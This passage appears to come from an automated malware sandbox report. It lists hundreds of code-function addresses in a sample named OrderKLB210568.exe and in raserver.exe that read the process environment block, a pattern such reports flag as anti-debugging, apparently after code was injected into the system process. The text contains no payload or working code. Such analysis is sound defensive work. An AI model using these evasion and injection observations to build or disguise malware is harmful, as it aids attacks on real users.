          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0517A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05117D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05133D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05173540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05177794 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05108794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051337F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0512A61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050FC600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05128E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051B1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051AFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050FE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051BAE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0510766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0518FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051746A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051C0EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051C8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05138EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051AFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051236CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051216E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051076E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050F9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0512513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05114120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05114120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0511B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050FB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05122990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0511C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0512A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051751BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051199BF mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051261A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051B49A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_050FB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
